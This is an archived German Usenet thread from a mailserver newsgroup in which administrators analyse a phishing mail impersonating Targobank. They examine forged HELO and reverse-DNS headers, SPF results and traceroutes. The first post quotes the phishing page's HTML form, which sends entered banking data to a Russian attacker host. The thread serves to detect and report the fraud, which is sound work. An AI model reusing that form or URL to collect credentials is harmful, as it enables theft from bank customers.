Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]


Groups > de.comm.software.mailserver > #5286 > unrolled thread

Phishing mail

Started byHerbert Kleebauer <klee@unibwm.de>
First post2016-03-26 11:03 +0100
Last post2016-03-28 08:29 +0200
Articles 20 on this page of 67 — 14 participants

Back to article view | Back to de.comm.software.mailserver


Contents

  Phishing mail Herbert Kleebauer <klee@unibwm.de> - 2016-03-26 11:03 +0100
    Re: Phishing mail Ulli Horlacher <framstag@rus.uni-stuttgart.de> - 2016-03-26 10:41 +0000
      Re: Phishing mail "Juergen P. Meier" <nospam-1984@jors.net> - 2016-03-26 11:00 +0000
        Re: Phishing mail Herbert Kleebauer <klee@unibwm.de> - 2016-03-26 12:59 +0100
          Re: Phishing mail Thomas Hochstein <thh@inter.net> - 2016-03-28 13:32 +0200
        Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-26 13:08 +0100
          Re: Phishing mail Thomas Hochstein <thh@inter.net> - 2016-03-27 10:35 +0200
            Re: Phishing mail "Juergen P. Meier" <nospam-1984@jors.net> - 2016-03-28 09:07 +0000
              Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-28 12:14 +0200
          Re: Phishing mail "Juergen P. Meier" <nospam-1984@jors.net> - 2016-03-28 09:05 +0000
      Re: Phishing mail Herbert Kleebauer <klee@unibwm.de> - 2016-03-26 12:30 +0100
      Re: Phishing mail Andreas Kohlbach <march.10.ankman@spamgourmet.net> - 2016-03-26 16:09 -0400
    Re: Phishing mail "Juergen P. Meier" <nospam-1984@jors.net> - 2016-03-26 10:50 +0000
      Re: Phishing mail Herbert Kleebauer <klee@unibwm.de> - 2016-03-26 12:44 +0100
        Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-26 13:10 +0100
          Re: Phishing mail Andreas Hartmann <andihartmann@01019freenet.de> - 2016-03-28 06:57 +0200
            Re: Phishing mail Arno Welzel <usenet@arnowelzel.de> - 2016-03-28 07:20 +0200
              Re: Phishing mail Andreas Hartmann <andihartmann@01019freenet.de> - 2016-03-28 08:22 +0200
                Re: Phishing mail "Juergen P. Meier" <nospam-1984@jors.net> - 2016-03-29 06:09 +0000
                  Re: Phishing mail Andreas Hartmann <andihartmann@01019freenet.de> - 2016-04-03 07:43 +0200
                    Re: Phishing mail Nomen Nescio <nobody@dizum.com> - 2016-04-03 11:27 +0200
                Re: Phishing mail Arno Welzel <usenet@arnowelzel.de> - 2016-03-29 13:32 +0200
                Re: Phishing mail Thomas Hochstein <thh@inter.net> - 2016-03-28 23:30 +0200
    Re: Phishing mail Arno Welzel <usenet@arnowelzel.de> - 2016-03-26 23:57 +0100
      Re: Phishing mail "Peter J. Holzer" <hjp-usenet3@hjp.at> - 2016-03-27 00:06 +0100
        Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-27 08:30 +0200
          Re: Phishing mail Herbert Kleebauer <klee@unibwm.de> - 2016-03-27 08:53 +0200
            Re: Phishing mail <dl8fbh@dl8fbh.ampr.org> - 2016-03-27 11:30 +0200
              Re: Phishing mail Herbert Kleebauer <klee@unibwm.de> - 2016-03-27 13:03 +0200
                Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-27 15:15 +0200
                  Re: Phishing mail "Peter J. Holzer" <hjp-usenet3@hjp.at> - 2016-03-27 16:25 +0200
                    Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-27 21:39 +0200
                      Re: Phishing mail "Peter J. Holzer" <hjp-usenet3@hjp.at> - 2016-03-28 12:17 +0200
                    Re: Phishing mail "Juergen P. Meier" <nospam-1984@jors.net> - 2016-03-28 08:52 +0000
          Re: Phishing mail "Peter J. Holzer" <hjp-usenet3@hjp.at> - 2016-03-27 12:21 +0200
            Re: Phishing mail Herbert Kleebauer <klee@unibwm.de> - 2016-03-27 13:03 +0200
              Re: Phishing mail "Peter J. Holzer" <hjp-usenet3@hjp.at> - 2016-03-27 15:24 +0200
                Re: Phishing mail Herbert Kleebauer <klee@unibwm.de> - 2016-03-27 17:15 +0200
                  Re: Phishing mail "Peter J. Holzer" <hjp-usenet3@hjp.at> - 2016-03-27 18:14 +0200
                    Re: Phishing mail Herbert Kleebauer <klee@unibwm.de> - 2016-03-27 19:27 +0200
                      Re: Phishing mail "Peter J. Holzer" <hjp-usenet3@hjp.at> - 2016-03-27 20:50 +0200
                        Re: Phishing mail Herbert Kleebauer <klee@unibwm.de> - 2016-03-27 22:41 +0200
                          Re: Phishing mail Arno Welzel <usenet@arnowelzel.de> - 2016-03-28 06:21 +0200
                            Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-28 08:30 +0200
                            Re: Phishing mail Herbert Kleebauer <klee@unibwm.de> - 2016-03-28 09:29 +0200
                              Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-28 10:17 +0200
                                Re: Phishing mail Stefan+Usenet@Froehlich.Priv.at (Stefan Froehlich) - 2016-03-28 09:15 +0000
                                  Re: Phishing mail "Juergen P. Meier" <nospam-1984@jors.net> - 2016-03-28 09:37 +0000
                                  Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-28 12:18 +0200
                                    Re: Phishing mail Stefan+Usenet@Froehlich.Priv.at (Stefan Froehlich) - 2016-03-28 11:01 +0000
                                      Re: Phishing mail "Peter J. Holzer" <hjp-usenet3@hjp.at> - 2016-03-28 13:44 +0200
                                        Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-28 13:59 +0200
                                          Re: Phishing mail Florian Weimer <fw@deneb.enyo.de> - 2016-03-28 14:23 +0200
                                            Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-28 15:45 +0200
                                              Re: Phishing mail Florian Weimer <fw@deneb.enyo.de> - 2016-03-28 20:28 +0200
                                                Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-29 16:36 +0200
                                            Re: Phishing mail Ralph Aichinger <ra@pi.h5.or.at> - 2016-03-28 22:13 +0200
                                              Re: Phishing mail Florian Weimer <fw@deneb.enyo.de> - 2016-03-28 22:27 +0200
                                                Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-29 15:55 +0200
                                      Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-28 13:57 +0200
                                  Re: Phishing mail "Peter J. Holzer" <hjp-usenet3@hjp.at> - 2016-03-28 12:49 +0200
                                Re: Phishing mail Herbert Kleebauer <klee@unibwm.de> - 2016-03-28 11:25 +0200
                                  Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-28 12:19 +0200
                                  Re: Phishing mail Arno Welzel <usenet@arnowelzel.de> - 2016-03-28 12:26 +0200
                              Re: Phishing mail Arno Welzel <usenet@arnowelzel.de> - 2016-03-28 12:20 +0200
                            Re: Phishing mail "Juergen P. Meier" <nospam-1984@jors.net> - 2016-03-28 09:01 +0000
                          Re: Phishing mail Marc Haber <mh+usenetspam1118@zugschl.us> - 2016-03-28 08:29 +0200

Page 1 of 4  [1] 2 3 4  Next page →


#5286 — Phishing mail

FromHerbert Kleebauer <klee@unibwm.de>
Date2016-03-26 11:03 +0100
SubjectPhishing mail
Message-ID<nd5mm6$hjk$1@dont-email.me>
Kann man die Mailheader tatsächlich so fälschen oder ist
diese mail wirklich über den Server der Targobank gegangen?

Bis auf die russische Empfängeradresse der Daten:

<form onsubmit="return chkFormular() name="Formular" method="POST"
action="http://targobank.de.sicherer-zahlen.ru/targo/de/konto/targobank/targo.php" >

werden alle anderen Daten von Targobank Seite geladen:

<link type="text/css" rel="stylesheet" href="https://www.targobank.de/de/css/v3commun.css" />
<script type="text/javascript" src="https://www.targobank.de/de/javascript/appli/menu/menutargo.js"></script>
<img alt="TARGOBANK Online Kredit Bank" src="https://www.targobank.de/de/images/css/env/logo.gif " />


===============================================================================================

X-Envelope-From: <service@targobank.de>
X-Envelope-To: <??@unibwm.de>
X-Delivery-Time: 1458983612
X-UID: 3073
Return-Path: <service@targobank.de>
Authentication-Results: strato.com 1;
spf=softfail
smtp.mailfrom="service@targobank.de";
dkim=none;
domainkeys=none;
dkim-adsp=none
header.from="service@targobank.de"
X-Strato-MessageType: email
X-RZG-CLASS-ID: mi
Received-SPF: softfail
client-ip=212.227.8.37;
helo="mail.targobank.de";
envelope-from="service@targobank.de";
receiver=smtp.rzone.de;
identity=mailfrom;
Received: from mail.targobank.de (targobank.de [212.227.8.37])
by smtp.rzone.de (RZmta 37.22 OK)
with ESMTP id f03a83s2Q9DW1x0
for <??@unibwm.de>;
Sat, 26 Mar 2016 10:13:32 +0100 (CET)
Received: from [212.227.72.105] (unknown [212.227.72.105])
by mail.targobank.de (Postfix) with ESMTPSA id 02E87F0EE7
for <??@unibwm.de>; Sat, 26 Mar 2016 09:13:31 +0000 (UTC)
Message-Id: <uvxb3cgCrO3zIno7uwEzXtDz7tUsFAEnCY1sIHBDSDww@targobank.de>
Mime-Version: 1.0
From: TARGOBANK <service@targobank.de>
To: ??@unibwm.de
Subject: =?iso-8859-1?Q?=C4nderung_Ihres_Telefon-Banking_Pin?=
Date: Sat, 26 Mar 2016 09:13:31 GMT

[toc] | [next] | [standalone]


#5287

FromUlli Horlacher <framstag@rus.uni-stuttgart.de>
Date2016-03-26 10:41 +0000
Message-ID<nd5p08$21n$1@news2.informatik.uni-stuttgart.de>
In reply to#5286
Herbert Kleebauer <klee@unibwm.de> wrote:
> Kann man die Mailheader tatsächlich so fälschen oder ist
> diese mail wirklich über den Server der Targobank gegangen?
> 
> 
> X-Envelope-From: <service@targobank.de>
> X-Envelope-To: <??@unibwm.de>
> X-Delivery-Time: 1458983612
> X-UID: 3073
> Return-Path: <service@targobank.de>
> Authentication-Results: strato.com 1;
> spf=softfail
> smtp.mailfrom="service@targobank.de";
> dkim=none;
> domainkeys=none;
> dkim-adsp=none
> header.from="service@targobank.de"
> X-Strato-MessageType: email
> X-RZG-CLASS-ID: mi
> Received-SPF: softfail
> client-ip=212.227.8.37;
> helo="mail.targobank.de";
> envelope-from="service@targobank.de";
> receiver=smtp.rzone.de;
> identity=mailfrom;
> Received: from mail.targobank.de (targobank.de [212.227.8.37])
> by smtp.rzone.de (RZmta 37.22 OK)
> with ESMTP id f03a83s2Q9DW1x0
> for <??@unibwm.de>;
> Sat, 26 Mar 2016 10:13:32 +0100 (CET)

Du solltest header nicht umformatieren, das erschwert die Lesbarkeit
erheblich.

Unter der Annahme, dass smtp.rzone.de ordentlich logged, kam die Mail von
targobank.de

Allerdings ist das eine komische Bank, die ihre Server bei 1&1 hosted.

inetnum:        212.227.0.0 - 212.227.13.255
netname:        SCHLUND-CUSTOMERS
descr:          1&1 Internet AG

Alleine das riecht schon SEHR komisch.


-- 
Ullrich Horlacher              Server und Virtualisierung
Rechenzentrum IZUS/TIK         E-Mail: horlacher@tik.uni-stuttgart.de
Universitaet Stuttgart         Tel:    ++49-711-68565868
Allmandring 30a                Fax:    ++49-711-682357
70550 Stuttgart (Germany)      WWW:    http://www.tik.uni-stuttgart.de/

[toc] | [prev] | [next] | [standalone]


#5289

From"Juergen P. Meier" <nospam-1984@jors.net>
Date2016-03-26 11:00 +0000
Message-ID<35685.32243.1458990045@news.jors.net>
In reply to#5287
begin 1 followup to Ulli Horlacher <framstag@rus.uni-stuttgart.de>:
> Herbert Kleebauer <klee@unibwm.de> wrote:
>> Kann man die Mailheader tatsächlich so fälschen oder ist
>> diese mail wirklich über den Server der Targobank gegangen?
>> 
>> 
>> X-Envelope-From: <service@targobank.de>
>> X-Envelope-To: <??@unibwm.de>
>> X-Delivery-Time: 1458983612
>> X-UID: 3073
>> Return-Path: <service@targobank.de>
>> Authentication-Results: strato.com 1;
>> spf=softfail
>> smtp.mailfrom="service@targobank.de";
>> dkim=none;
>> domainkeys=none;
>> dkim-adsp=none
>> header.from="service@targobank.de"
>> X-Strato-MessageType: email
>> X-RZG-CLASS-ID: mi
>> Received-SPF: softfail
>> client-ip=212.227.8.37;
>> helo="mail.targobank.de";
>> envelope-from="service@targobank.de";
>> receiver=smtp.rzone.de;
>> identity=mailfrom;
>> Received: from mail.targobank.de (targobank.de [212.227.8.37])
>> by smtp.rzone.de (RZmta 37.22 OK)
>> with ESMTP id f03a83s2Q9DW1x0
>> for <??@unibwm.de>;
>> Sat, 26 Mar 2016 10:13:32 +0100 (CET)
>
> Du solltest header nicht umformatieren, das erschwert die Lesbarkeit
> erheblich.
>
> Unter der Annahme, dass smtp.rzone.de ordentlich logged, kam die Mail von
> targobank.de

Unfug.

Die Mail kam von einem System bei Schlund (1&1), das von
sich behauptet, "targobank.de" zu heissen.

Mit der Domain targobank.de hat das ansonsten nichts zu tun.

> Allerdings ist das eine komische Bank, die ihre Server bei 1&1 hosted.
>
> inetnum:        212.227.0.0 - 212.227.13.255
> netname:        SCHLUND-CUSTOMERS
> descr:          1&1 Internet AG
>
> Alleine das riecht schon SEHR komisch.

Das richt nicht nur komisch, das ist eine voellig handelsuebliche
Faelschung.

Jeder Depp kann das bei Hostern wie Schlund mit einem Klick hinfummeln.

Juergen
-- 
Juergen P. Meier - "This World is about to be Destroyed!"
end
If you think technology can solve your problems you don't understand
technology and you don't understand your problems.  (Bruce Schneier)

[toc] | [prev] | [next] | [standalone]


#5293

FromHerbert Kleebauer <klee@unibwm.de>
Date2016-03-26 12:59 +0100
Message-ID<nd5tkf$fvh$1@gioia.aioe.org>
In reply to#5289
On 26.03.2016 12:00, Juergen P. Meier wrote:

> Die Mail kam von einem System bei Schlund (1&1), das von
> sich behauptet, "targobank.de" zu heissen.

Soll das heißen, man kann auch den Angaben des nameservers
nicht mehr vertrauen? Kann jeder für seine IP Adresse einen
fremden Domainnamein eintragen lassen?


tracert 212.227.8.37

Routenverfolgung zu targobank.de [212.227.8.37] über maximal 30 Abschnitte:

  1     1 ms     1 ms    <1 ms  speedport.ip [192.168.2.1]
  2    22 ms    22 ms    21 ms  217.0.117.46
  3    23 ms    23 ms    22 ms  87.190.170.182
  4    33 ms    32 ms    32 ms  ka-ea4-i.KA.DE.NET.DTAG.DE [62.154.74.62]
  5    32 ms    32 ms    32 ms  ka-ea4-i.KA.DE.NET.DTAG.DE [62.154.74.62]
  6    35 ms    36 ms    36 ms  dtag.bb-a.tp.kae.de.oneandone.net [80.156.160.54]
  7    33 ms    34 ms    34 ms  ae-3-0.bb-a.bap.rhr.de.oneandone.net [212.227.120.45]
  8     *       78 ms    48 ms  ae-10.gw-distp-a.bap.rhr.de.oneandone.net [212.227.121.165]
  9    35 ms    34 ms    34 ms  212.227.218.15
 10     *        *        *     Zeitüberschreitung der Anforderung.
 11     *        *        *     Zeitüberschreitung der Anforderung.
 12     *        *        *     Zeitüberschreitung der Anforderung.
 13     *        *        *     Zeitüberschreitung der Anforderung.
 14     *        *        *     Zeitüberschreitung der Anforderung.
 15     *        *        *     Zeitüberschreitung der Anforderung.
 16     *        *     ^C


tracert 145.226.46.149

Routenverfolgung zu targobank.de [145.226.46.149] über maximal 30 Abschnitte:

  1     1 ms     1 ms     1 ms  speedport.ip [192.168.2.1]
  2    22 ms    22 ms    21 ms  217.0.117.46
  3    22 ms    23 ms    23 ms  87.190.170.182
  4    32 ms    35 ms    35 ms  f-eb2-i.F.DE.NET.DTAG.DE [62.154.17.98]
  5    31 ms    60 ms    60 ms  80.157.129.70
  6    45 ms    45 ms    44 ms  et-5-0-0.GW7.SDE2.ALTER.NET [140.222.232.239]
  7    55 ms    56 ms    56 ms  212.208.19.14
  8    51 ms    51 ms    51 ms  10.242.1.1
  9    57 ms    54 ms    56 ms  10.242.129.19
 10    55 ms    55 ms    55 ms  10.242.128.62
 11    53 ms    52 ms    53 ms  targobank.de [145.226.46.149]

Ablaufverfolgung beendet.

[toc] | [prev] | [next] | [standalone]


#5345

FromThomas Hochstein <thh@inter.net>
Date2016-03-28 13:32 +0200
Message-ID<dcsm.1603281332.229@landroval.ancalagon.de>
In reply to#5293
Herbert Kleebauer schrieb:

> On 26.03.2016 12:00, Juergen P. Meier wrote:
>> Die Mail kam von einem System bei Schlund (1&1), das von
>> sich behauptet, "targobank.de" zu heissen.
>
> Soll das heißen, man kann auch den Angaben des nameservers
> nicht mehr vertrauen? Kann jeder für seine IP Adresse einen
> fremden Domainnamein eintragen lassen?

Wenn sein Provider das zulässt: freilich.

Daher gehört zur Überprüfung der Rückwärtsauflösung immer auch die
Vorwärtsauflösung dazu.

[...]
> Ablaufverfolgung beendet.

Und das sagt Dir (oder uns?) jetzt was?

-thh

[toc] | [prev] | [next] | [standalone]


#5294

FromMarc Haber <mh+usenetspam1118@zugschl.us>
Date2016-03-26 13:08 +0100
Message-ID<nd5u34$st3$1@news1.tnib.de>
In reply to#5289
"Juergen P. Meier" <nospam-1984@jors.net> wrote:
>begin 1 followup to Ulli Horlacher <framstag@rus.uni-stuttgart.de>:
>> Herbert Kleebauer <klee@unibwm.de> wrote:
>>> Received: from mail.targobank.de (targobank.de [212.227.8.37])
>>> by smtp.rzone.de (RZmta 37.22 OK)
>>> with ESMTP id f03a83s2Q9DW1x0
>>> for <??@unibwm.de>;
>>> Sat, 26 Mar 2016 10:13:32 +0100 (CET)
>>
>> Du solltest header nicht umformatieren, das erschwert die Lesbarkeit
>> erheblich.
>>
>> Unter der Annahme, dass smtp.rzone.de ordentlich logged, kam die Mail von
>> targobank.de
>
>Unfug.
>
>Die Mail kam von einem System bei Schlund (1&1), das von
>sich behauptet, "targobank.de" zu heissen.
>
>Mit der Domain targobank.de hat das ansonsten nichts zu tun.

Erwarte ich zuu viel, wenn ich hoffen würde, dass smtp.rzone.de nur
hostnamen in seine Received-Header schreibt, bei denen der DNS
vorwärte _und_ rückwärts passt?

Außerdem finde ich das sehr interessant, dass der Reverse eingetragen
wurde. Normalerweise prüft 1&1 beim Eintrag von Reverse DNS Records ob
der Forward passt.

>Jeder Depp kann das bei Hostern wie Schlund mit einem Klick hinfummeln.

Nicht unbedingt.

Grüße
Marc
-- 
-------------------------------------- !! No courtesy copies, please !! -----
Marc Haber         |   " Questions are the         | Mailadresse im Header
Mannheim, Germany  |     Beginning of Wisdom "     | http://www.zugschlus.de/
Nordisch by Nature | Lt. Worf, TNG "Rightful Heir" | Fon: *49 621 72739834

[toc] | [prev] | [next] | [standalone]


#5316

FromThomas Hochstein <thh@inter.net>
Date2016-03-27 10:35 +0200
Message-ID<dcsm.1603271035.195@landroval.ancalagon.de>
In reply to#5294
Marc Haber schrieb:

> Außerdem finde ich das sehr interessant, dass der Reverse eingetragen
> wurde. Normalerweise prüft 1&1 beim Eintrag von Reverse DNS Records ob
> der Forward passt.

Das wundert mich allerdings auch; ich hatte angenommen, sie würden das
jetzt nicht mehr machen.

[toc] | [prev] | [next] | [standalone]


#5332

From"Juergen P. Meier" <nospam-1984@jors.net>
Date2016-03-28 09:07 +0000
Message-ID<35693.15814.1459156023@news.jors.net>
In reply to#5316
Thomas Hochstein <thh@inter.net>:
> Marc Haber schrieb:
>
>> Außerdem finde ich das sehr interessant, dass der Reverse eingetragen
>> wurde. Normalerweise prüft 1&1 beim Eintrag von Reverse DNS Records ob
>> der Forward passt.
>
> Das wundert mich allerdings auch; ich hatte angenommen, sie würden das
> jetzt nicht mehr machen.

Evtl. ist Schlund auch selbst Opfer eines DNS Poisoning Angriffs geworden,
der das Anlegen dieses PTR ermoetlicht hat.

Aber das ist alles Spekulation.

[toc] | [prev] | [next] | [standalone]


#5336

FromMarc Haber <mh+usenetspam1118@zugschl.us>
Date2016-03-28 12:14 +0200
Message-ID<ndb06q$kce$1@news1.tnib.de>
In reply to#5332
"Juergen P. Meier" <nospam-1984@jors.net> wrote:
>Thomas Hochstein <thh@inter.net>:
>> Marc Haber schrieb:
>>
>>> Außerdem finde ich das sehr interessant, dass der Reverse eingetragen
>>> wurde. Normalerweise prüft 1&1 beim Eintrag von Reverse DNS Records ob
>>> der Forward passt.
>>
>> Das wundert mich allerdings auch; ich hatte angenommen, sie würden das
>> jetzt nicht mehr machen.
>
>Evtl. ist Schlund auch selbst Opfer eines DNS Poisoning Angriffs geworden,
>der das Anlegen dieses PTR ermoetlicht hat.
>
>Aber das ist alles Spekulation.

In der Tat. Welcher DNS-Server ist heute noch für Poisoning anfällig,
und glaubst Du ernsthaft, ein solcher DNS-Server würde mit der in so
einer Umgebung auftretenden Last fertig werden ohne in
Sekundenbruchteilen zu explodieren?

Grüße
Marc
-- 
-------------------------------------- !! No courtesy copies, please !! -----
Marc Haber         |   " Questions are the         | Mailadresse im Header
Mannheim, Germany  |     Beginning of Wisdom "     | http://www.zugschlus.de/
Nordisch by Nature | Lt. Worf, TNG "Rightful Heir" | Fon: *49 621 72739834

[toc] | [prev] | [next] | [standalone]


#5331

From"Juergen P. Meier" <nospam-1984@jors.net>
Date2016-03-28 09:05 +0000
Message-ID<35692.15790.1459155925@news.jors.net>
In reply to#5294
Marc Haber <mh+usenetspam1118@zugschl.us>:
>
> Erwarte ich zuu viel, wenn ich hoffen würde, dass smtp.rzone.de nur
> hostnamen in seine Received-Header schreibt, bei denen der DNS
> vorwärte _und_ rückwärts passt?

Nein, damit erwartest du nicht zu viel. DAs sollte seit vielen Jahren
*Standard* sein bei Mailexchangern in oeffentlichen Datennetzen.

> Außerdem finde ich das sehr interessant, dass der Reverse eingetragen
> wurde. Normalerweise prüft 1&1 beim Eintrag von Reverse DNS Records ob
> der Forward passt.

Vielleicht wurde eine andre Schnittstelle als das Webfrontend
verwendet, ich kenne mich bei diesem Hoster nicht wirklich aus.

[toc] | [prev] | [next] | [standalone]


#5291

FromHerbert Kleebauer <klee@unibwm.de>
Date2016-03-26 12:30 +0100
Message-ID<nd5s0q$d49$1@gioia.aioe.org>
In reply to#5287
On 26.03.2016 11:41, Ulli Horlacher wrote:

> Du solltest header nicht umformatieren, das erschwert die Lesbarkeit
> erheblich.

War keine Absicht. Thunderbird ignoriert bei einem Paste anscheinend
alle Tabs am Zeilenanfang.

X-Envelope-From: <service@targobank.de>
X-Envelope-To: <??@unibwm.de>
X-Delivery-Time: 1458983612
X-UID: 3073
Return-Path: <service@targobank.de>
Authentication-Results: strato.com 1;
        spf=softfail
        	smtp.mailfrom="service@targobank.de";
        dkim=none;
        domainkeys=none;
        dkim-adsp=none
                header.from="service@targobank.de"
X-Strato-MessageType: email
X-RZG-CLASS-ID: mi
Received-SPF: softfail
        client-ip=212.227.8.37;
        helo="mail.targobank.de";
        envelope-from="service@targobank.de";
        receiver=smtp.rzone.de;
        identity=mailfrom;
Received: from mail.targobank.de (targobank.de [212.227.8.37])
        by smtp.rzone.de (RZmta 37.22 OK)
        with ESMTP id f03a83s2Q9DW1x0
        for <??@unibwm.de>;
        Sat, 26 Mar 2016 10:13:32 +0100 (CET)
Received: from [212.227.72.105] (unknown [212.227.72.105])
        by mail.targobank.de (Postfix) with ESMTPSA id 02E87F0EE7
        for <??@unibwm.de>; Sat, 26 Mar 2016 09:13:31 +0000 (UTC)
Message-Id: <uvxb3cgCrO3zIno7uwEzXtDz7tUsFAEnCY1sIHBDSDww@targobank.de>
Mime-Version: 1.0
From: TARGOBANK <service@targobank.de>
To: ??@unibwm.de
Subject: =?iso-8859-1?Q?=C4nderung_Ihres_Telefon-Banking_Pin?=
Date: Sat, 26 Mar 2016 09:13:31 GMT

[toc] | [prev] | [next] | [standalone]


#5299

FromAndreas Kohlbach <march.10.ankman@spamgourmet.net>
Date2016-03-26 16:09 -0400
Message-ID<8760w93stf.fsf@usenet.ankman.de>
In reply to#5287
Ulli Horlacher wrote on 26. March 2016:
>
> Herbert Kleebauer <klee@unibwm.de> wrote:
>> Kann man die Mailheader tatsächlich so fälschen oder ist
>> diese mail wirklich über den Server der Targobank gegangen?

[...]

> Unter der Annahme, dass smtp.rzone.de ordentlich logged, kam die Mail von
> targobank.de
>
> Allerdings ist das eine komische Bank, die ihre Server bei 1&1 hosted.
>
> inetnum:        212.227.0.0 - 212.227.13.255
> netname:        SCHLUND-CUSTOMERS
> descr:          1&1 Internet AG
>
> Alleine das riecht schon SEHR komisch.

>> Warum schauen sich alle hier nur die Header an? Der teilweise von Ulli
>> gepostete Body sieht IMO auch interessant aus:
>>
>> Kann man die Mailheader tatsächlich so fälschen oder ist
>> diese mail wirklich über den Server der Targobank gegangen?
>
>> Bis auf die russische Empfängeradresse der Daten:
>
>> <form onsubmit="return chkFormular() name="Formular" method="POST"
>> action="http://targobank.de.sicherer-zahlen.ru/targo/de/konto/targobank/targo.php" >
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Natürlich kann man einer Deutschen Bank mit langer Adresse und Russischer
TLD voll und ganz vertrauen. ;-)

Die Seite scheint bei Sedoparking zu sein, ist aber trotzdem aktiv, so
dass das Formular in der Mail - was eher ist selten ist, funktionieren
wird.

sicherer-zahlen.ru löst nach 83.217.25.163 auf, was firstbyte.ru ist. Ob
die auf Beschwerden reagieren, wage ich zu bezweifeln, weil ich dazu
neige, in Putin-Land alles über einen Kamm zu scheren und für korrupt
und verkommen zu empfinden. Aber vielleicht gibt es Fälle, wo ich
Unrecht habe.

Besser scheint mir de.admin.net-abuse.mail zu sein, dass ich mal dorthin
weiter leite.
-- 
Andreas

I use a Unix based operating system, which means I get laid almost as often
as I have to reboot my computer.

[toc] | [prev] | [next] | [standalone]


#5288

From"Juergen P. Meier" <nospam-1984@jors.net>
Date2016-03-26 10:50 +0000
Message-ID<35684.32202.1458989439@news.jors.net>
In reply to#5286
Herbert Kleebauer <klee@unibwm.de>:
> Kann man die Mailheader tatsächlich so fälschen oder ist
> diese mail wirklich über den Server der Targobank gegangen?
>
> Received: from mail.targobank.de (targobank.de [212.227.8.37])
>  by smtp.rzone.de (RZmta 37.22 OK)
>  with ESMTP id f03a83s2Q9DW1x0
>  for <??@unibwm.de>;

rzone ist dein MTA?

Dann verifiziert er das HELO nicht richtig. Das ist eine
HELO-Faelschung wie sie im Buche steht.

Alles nach dieser Zeile ist frei erfunden weil vom einliefernden
System nach belieben gesetzt.

> Sat, 26 Mar 2016 10:13:32 +0100 (CET)
> Received: from [212.227.72.105] (unknown [212.227.72.105])
> by mail.targobank.de (Postfix) with ESMTPSA id 02E87F0EE7
> for <??@unibwm.de>; Sat, 26 Mar 2016 09:13:31 +0000 (UTC)
> Message-Id: <uvxb3cgCrO3zIno7uwEzXtDz7tUsFAEnCY1sIHBDSDww@targobank.de>
> Mime-Version: 1.0
> From: TARGOBANK <service@targobank.de>
> To: ??@unibwm.de
> Subject: =?iso-8859-1?Q?=C4nderung_Ihres_Telefon-Banking_Pin?=
> Date: Sat, 26 Mar 2016 09:13:31 GMT

Beschwer dich bitte beim Betreiber von rzone.de darueber, dass ihr
Mailserver geflissentlich jeden Unsinn ohne Verifikation glaubt, den
ihm fremde Mailserver erzaehlen. (HELO mit Reverse-PTR Faelschung)

Moderne Mailsysteme verifizieren, dass folgendes zueinander passt:

1. Die IP Adresse des einliefernden Mailsystems muss rueckwaerts
aufloesen auf einen Hostnamen.
2. Dieser Hostname muss vorwaerts auf die IP-Adresse aufloesen.
3. Der HELO Parameter muss ebenfalls auf diese IP-Adresse aufloesen
Dabei muessen HELO und PTR der IP-Adresse nicht uebereinstimmen, aber
beide muessen auf diese IP-Adresse aufloesen.

Nur so kann die Faelschung dieses Betrugs erkannt werden.

Apropos: Schlund aka Eins-und-Eins macht sich als Mitstoerer haftbar,
wenn sie diesen Server noch weiter am Netz lassen nachdem du sie als
potentielles Opfer des Bankbetruegers sie darauf hingewiesen hast.

Ansonsten freut sich auch die Polizei ueber jeden Hinweis zu solchen
Betruegern, insb. wenn sie zumindest zum Teil innerhalb Deutschlands
operieren.

Juergen
-- 
Juergen P. Meier - "This World is about to be Destroyed!"
end
If you think technology can solve your problems you don't understand
technology and you don't understand your problems.  (Bruce Schneier)

[toc] | [prev] | [next] | [standalone]


#5292

FromHerbert Kleebauer <klee@unibwm.de>
Date2016-03-26 12:44 +0100
Message-ID<nd5soe$ebv$1@gioia.aioe.org>
In reply to#5288
On 26.03.2016 11:50, Juergen P. Meier wrote:


>> Received: from mail.targobank.de (targobank.de [212.227.8.37])
>>         by smtp.rzone.de (RZmta 37.22 OK)
>>         with ESMTP id f03a83s2Q9DW1x0
>>         for <??@unibwm.de>;
>>         Sat, 26 Mar 2016 10:13:32 +0100 (CET)

> Alles nach dieser Zeile ist frei erfunden weil vom einliefernden
> System nach belieben gesetzt.

Entscheidend sind aber eben obige Zeilen. Ein nslookup liefert

nslookup 212.227.8.37

Name:    targobank.de
Address:  212.227.8.37


d.h. die mail scheint tatsächlich von targobank.de an Strato
geliefert wurden zu sein. Was immer davor war kann natürlich
gefälscht sein.


> rzone ist dein MTA?

unibwm.de ist bei Strato gehostet.

[toc] | [prev] | [next] | [standalone]


#5295

FromMarc Haber <mh+usenetspam1118@zugschl.us>
Date2016-03-26 13:10 +0100
Message-ID<nd5u6r$t5m$1@news1.tnib.de>
In reply to#5292
Herbert Kleebauer <klee@unibwm.de> wrote:
>Entscheidend sind aber eben obige Zeilen. Ein nslookup liefert
>
>nslookup 212.227.8.37
>
>Name:    targobank.de
>Address:  212.227.8.37

Richtig. Aber:

targobank.de löst vorwärts nicht auf 212.227.8.37 auf. Das würden die
Systeme von 1&1 so nicht akzeptieren. Es sei denn, der Forward-Eintrag
hat gestimmt als der Reverse-Eintrag gemacht wurde.

>d.h. die mail scheint tatsächlich von targobank.de an Strato
>geliefert wurden zu sein.

Nein, das kannst Du erst dann mit Sicherheit sagen wenn der Forward
auch stimmt.

Grüße
Marc
-- 
